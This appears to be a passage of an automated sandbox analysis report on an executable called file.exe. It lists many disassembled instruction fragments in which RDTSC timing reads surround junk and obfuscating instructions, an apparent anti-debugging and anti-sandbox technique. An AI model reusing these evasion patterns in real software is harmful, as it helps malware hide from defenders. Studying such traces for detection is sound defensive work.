                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D77D03 second address: D77D15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF8Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D77E76 second address: D77E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A30F498D5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D77E8F second address: D77EA2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3A30BBDF86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b js 00007F3A30BBDF86h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D781BD second address: D781C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D78574 second address: D7857E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7857E second address: D78586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D78586 second address: D785C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnl 00007F3A30BBDF86h 0x0000000c jmp 00007F3A30BBDF8Ch 0x00000011 popad 0x00000012 jmp 00007F3A30BBDF8Ah 0x00000017 push edx 0x00000018 jmp 00007F3A30BBDF98h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B5E5 second address: D7B5F8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jns 00007F3A30F498C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B5F8 second address: D7B5FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B5FD second address: D7B614 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jns 00007F3A30F498C6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B614 second address: D7B619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B619 second address: BF18FF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A30F498CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jmp 00007F3A30F498CEh 0x00000012 jmp 00007F3A30F498D2h 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jmp 00007F3A30F498D4h 0x00000021 pop eax 0x00000022 js 00007F3A30F498C6h 0x00000028 call 00007F3A30F498D8h 0x0000002d pop edx 0x0000002e push dword ptr [ebp+122D0A61h] 0x00000034 and dx, 63AAh 0x00000039 call dword ptr [ebp+122D17F3h] 0x0000003f pushad 0x00000040 mov dword ptr [ebp+122D2552h], ebx 0x00000046 xor eax, eax 0x00000048 clc 0x00000049 mov edx, dword ptr [esp+28h] 0x0000004d mov dword ptr [ebp+122D2552h], eax 0x00000053 mov dword ptr [ebp+122D2997h], eax 0x00000059 pushad 0x0000005a mov ecx, dword ptr [ebp+122D27C7h] 0x00000060 add ecx, dword ptr [ebp+122D291Fh] 0x00000066 popad 0x00000067 mov esi, 0000003Ch 0x0000006c mov dword ptr [ebp+122D2552h], ecx 0x00000072 ja 00007F3A30F498D4h 0x00000078 jmp 00007F3A30F498CEh 0x0000007d add esi, dword ptr [esp+24h] 0x00000081 cld 0x00000082 lodsw 0x00000084 jmp 00007F3A30F498D0h 0x00000089 add eax, dword ptr [esp+24h] 0x0000008d jmp 00007F3A30F498D3h 0x00000092 mov ebx, dword ptr [esp+24h] 0x00000096 pushad 0x00000097 mov dword ptr [ebp+122D2552h], eax 0x0000009d mov esi, edi 0x0000009f popad 0x000000a0 push eax 0x000000a1 push eax 0x000000a2 push edx 0x000000a3 jmp 00007F3A30F498D1h 0x000000a8 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B6EB second address: D7B701 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B701 second address: D7B75E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A30F498C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F3A30F498CEh 0x00000013 mov eax, dword ptr [eax] 0x00000015 jno 00007F3A30F498E0h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push edi 0x00000022 jmp 00007F3A30F498D5h 0x00000027 pop edi 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B75E second address: D7B764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B764 second address: D7B768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B8C7 second address: D7B8E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3A30BBDF94h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B8E3 second address: D7B8E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BA09 second address: D7BA0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BBA9 second address: D7BBBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A30F498D1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BBBE second address: D7BC23 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3A30BBDF86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 38D557A1h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F3A30BBDF88h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov ch, BAh 0x0000002f lea ebx, dword ptr [ebp+1245D4F2h] 0x00000035 jmp 00007F3A30BBDF8Bh 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F3A30BBDF98h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BFEB second address: D9BFF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BD37 second address: D6BD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BD3C second address: D6BD41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9A344 second address: D9A369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3A30BBDF90h 0x0000000c jmp 00007F3A30BBDF8Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9A4BD second address: D9A4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9A4C6 second address: D9A4E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF98h 0x00000007 jbe 00007F3A30BBDF92h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9A4E8 second address: D9A4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9A917 second address: D9A92A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3A30BBDF8Eh 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B003 second address: D9B007 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B007 second address: D9B021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3A30BBDF8Ah 0x0000000d push edi 0x0000000e jns 00007F3A30BBDF86h 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A271 second address: D6A2A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F3A30F498DEh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A2A6 second address: D6A2AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A2AE second address: D6A2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A2B2 second address: D6A2B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BA39 second address: D9BA58 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3A30F498D9h 0x00000008 jmp 00007F3A30F498CDh 0x0000000d jns 00007F3A30F498C6h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BA58 second address: D9BA5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BE71 second address: D9BE95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3A30F498C6h 0x0000000a popad 0x0000000b jmp 00007F3A30F498D6h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BE95 second address: D9BE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BE9B second address: D9BEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BEA5 second address: D9BEAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1935 second address: DA193B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA193B second address: DA193F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA193F second address: DA1943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1E90 second address: DA1E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1E94 second address: DA1E98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1E98 second address: DA1EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1EA2 second address: DA1ED7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F3A30F498CAh 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 je 00007F3A30F498D4h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1ED7 second address: DA1EF1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3A30BBDF86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F3A30BBDF8Ch 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1EF1 second address: DA1F0E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F3A30F498C6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 push edi 0x00000012 jc 00007F3A30F498C6h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1F0E second address: DA1F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E5B7 second address: D5E5BD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E5BD second address: D5E5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F3A30BBDF86h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E5CE second address: D5E5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E5D2 second address: D5E5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E5D8 second address: D5E5EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498CEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E5EC second address: D5E5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA853C second address: DA8540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8540 second address: DA8573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F3A30BBDF98h 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA80D3 second address: DA80F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F3A30F498D7h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8262 second address: DA8266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8266 second address: DA828F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498D5h 0x00000007 jmp 00007F3A30F498CCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA828F second address: DA8295 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA83D2 second address: DA83EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F3A30F498D1h 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC648 second address: DAC657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30BBDF8Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC657 second address: DAC65D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66CD7 second address: D66CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3A30BBDF90h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66CF4 second address: D66CFC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66CFC second address: D66D0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3A30BBDF86h 0x0000000a js 00007F3A30BBDF86h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACCE8 second address: DACCF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACDCE second address: DACDD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAD411 second address: DAD421 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A30F498CBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DADC10 second address: DADC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DADEEB second address: DADEEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DADEEF second address: DADEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAEEFF second address: DAEF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F3A30F498C8h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAEE03 second address: DAEE0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F3A30BBDF86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAEF0F second address: DAEF8A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3A30F498CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F3A30F498C8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F3A30F498C8h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 push 00000000h 0x00000043 mov esi, ecx 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F3A30F498D8h 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAEF8A second address: DAEF90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAEE0D second address: DAEE11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAEF90 second address: DAEF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB003F second address: DB0043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB147F second address: DB1483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB1483 second address: DB1489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6545 second address: DB655F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30BBDF95h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB1C5A second address: DB1C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6C1A second address: DB6C20 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6C20 second address: DB6C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9943 second address: DB99B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F3A30BBDF86h 0x00000009 ja 00007F3A30BBDF86h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jl 00007F3A30BBDF9Fh 0x00000019 jmp 00007F3A30BBDF99h 0x0000001e nop 0x0000001f or dword ptr [ebp+122D19D0h], esi 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F3A30BBDF88h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 push 00000000h 0x00000043 pushad 0x00000044 and edi, dword ptr [ebp+122D2B0Fh] 0x0000004a mov si, ax 0x0000004d popad 0x0000004e mov bl, DCh 0x00000050 xchg eax, esi 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6C26 second address: DB6C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6C2A second address: DB6C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6C2E second address: DB6C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3A30F498D2h 0x00000012 rdtsc
